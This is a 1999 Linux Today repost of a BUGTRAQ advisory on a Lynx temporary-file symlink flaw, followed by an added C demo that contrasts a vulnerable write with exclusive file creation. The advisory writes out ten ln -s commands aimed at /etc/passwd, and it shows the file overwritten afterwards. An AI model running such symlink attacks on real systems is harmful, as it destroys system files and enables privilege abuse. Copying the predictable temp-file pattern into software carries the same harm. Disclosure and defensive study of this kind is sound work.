Security hole in Lynx | Linux Today

Security hole in Lynx

Written By
Web Webster
Feb 11, 1999
Juan Diego Bolanos posted to BUGTRAQ:

Subject: Lynx /tmp problem

Hello....

I have found a bug in all versions of Lynx, except the latest stable
release...

Lynx creates temporary files in /tmp in this way....


L[num proc]-xTMP.html

where

[num proc] is the proc number in the machine
x is a number from 0 to 9

If I run lynx as any user, for example root, we see this:

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW   0:06 (bash)
   94   4 S    0:05 -bash
   95   5 SW   0:06 (bash)
 3867  a3 S    0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
 3870   3 SW   0:02 (ssh)
 3894   4 T    0:00 lynx
 3898   4 R    0:00 ps

then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

If I make a symlink
from all of these files to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd  L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-9TMP.html

and now root (in this example) tries to download a file, or presses the
backspace key to reach the history list, the file I have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...

For example, I got this on my system...

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
  <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


As you see, the file is lost now...

This bug is lynx specific, so all OSes are vulnerable..

Fix: upgrade to the latest lynx version. I have checked it, and it appears
to use L[proc num]-xTMP.html where x is from 0 to ???...

I hope it is already fixed; creating 100 symlinks is not too hard :)

the lynx team know this yet.

by...


Juan Diego

Lynx’s homepage is http://lynx.browser.org -lt ed
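
Added example (not part of the original post and not Lynx's own code): the report's failure mode reproduced in a private scratch directory, with a write through a predictable name using fopen("w") beside exclusive creation with O_CREAT|O_EXCL, which refuses a pre-planted symlink. The scratch directory, the "victim" file and all function names are constructed for illustration.

```c
#define _XOPEN_SOURCE 700   /* for mkdtemp() and symlink() */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Pattern from the report: fopen("w") follows a symlink and truncates its target. */
static int write_following(const char *path, const char *data) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(data, f);
    return fclose(f);
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST if anything, a symlink included, is at path. */
static int write_exclusive(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -1;               /* refuse instead of overwriting */
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

static int file_is(const char *path, const char *expect) {
    char buf[128] = {0};
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    return n == strlen(expect) && memcmp(buf, expect, n) == 0;
}

/* Constructed scenario: returns 1 if the linked-to file keeps its content, 0 if clobbered. */
int victim_survives(int exclusive) {
    char dir[] = "/tmp/lynxdemo-XXXXXX", victim[64], tmp[64];
    if (!mkdtemp(dir)) return -1;        /* private 0700 scratch directory */
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/L3894-0TMP.html", dir);
    write_following(victim, "important\n");
    if (symlink(victim, tmp) != 0) return -1;   /* link planted at the predictable name */
    (exclusive ? write_exclusive : write_following)(tmp, "history page\n");
    int ok = file_is(victim, "important\n");
    unlink(tmp); unlink(victim); rmdir(dir);
    return ok;
}
int main(void) {
    printf("fopen: intact=%d\nO_EXCL: intact=%d\n", victim_survives(0), victim_survives(1));
    return 0;
}
```

In application code mkstemp() combines an unpredictable name with the same exclusive-create semantics, so the name cannot be enumerated in advance either.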
